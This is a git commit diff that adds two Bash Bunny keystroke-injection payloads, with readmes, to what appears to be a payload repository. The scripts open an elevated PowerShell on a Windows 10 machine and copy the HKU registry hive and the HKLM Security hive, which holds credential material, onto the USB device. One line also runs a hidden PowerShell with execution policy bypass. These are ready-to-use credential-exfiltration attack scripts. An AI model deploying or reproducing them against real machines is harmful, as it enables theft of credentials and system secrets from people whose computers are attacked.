Added new payload WIN_PoSH_HKU_RegBackUp (#424)
* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunnypull/427/head
parent
b8a329232a
commit
3904f165d9
|
@ -0,0 +1,23 @@
|
|||
# Title: Backup User registry (HKU)
|
||||
# Description: Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny
|
||||
# Author: Cribbit
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration
|
||||
# Target: Windows 10 (Creators Update) (Powershell)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Config: Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
Q DELAY 200
|
||||
REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
|
||||
Q GUI x
|
||||
Q STRING a
|
||||
Q DELAY 100
|
||||
Q ALT y
|
||||
Q DELAY 100
|
||||
Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,30 @@
|
|||
# Backup User registry (HKU)
|
||||
* Author: Cribbit
|
||||
* Version: 1.1
|
||||
* Target: Windows 10 (Creators Update) (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmode: HID & STORAGE
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | -------------------------------|
|
||||
| 1.0 | Initial release |
|
||||
| 1.1 | Use Admin Shell (for all keys) |
|
||||
|
||||
## Description
|
||||
Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny.
|
||||
|
||||
## Configuration
|
||||
RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]
|
||||
|
||||
Usesful Reg.exe export parameters:
|
||||
* /y Force overwriting the existing file without prompt.
|
||||
* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
|
||||
* /reg:64 Specifies the key should be accessed using the 64-bit registry view.
|
||||
|
||||
## Colors
|
||||
| Status | Color | Description |
|
||||
| --------- | ------------------------------| ------------------------------------------------ |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Save security hive
|
||||
# Description: Uses PowerShell, to run Reg.exe to save security hive to the bunny.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: Windows 10 Creators Update (Powershell)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Props: Ben Clark (RTFM)
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
Q DELAY 200
|
||||
Q GUI x
|
||||
Q STRING a
|
||||
sleep 2
|
||||
Q ALT y
|
||||
sleep 2
|
||||
Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,26 @@
|
|||
# Save security hive
|
||||
* Author: Cribbit
|
||||
* Version: 1.0
|
||||
* Target: Windows 10 (Creators Update) (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmode: HID & STORAGE
|
||||
* Props: Ben Clark (RTFM)
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | ------------------------------|
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Uses PowerShell, to run Reg.exe to save security hive to the bunny.
|
||||
## Configuration
|
||||
Usesful Reg.exe save parameters:
|
||||
* /y Force overwriting the existing file without prompt.
|
||||
* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
|
||||
* /reg:64 Specifies the key should be accessed using the 64-bit registry view.
|
||||
## Colors
|
||||
| Status | Color | Description |
|
||||
| --------- | ------------------------------| ------------------------------------------------ |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
Loading…
Reference in New Issue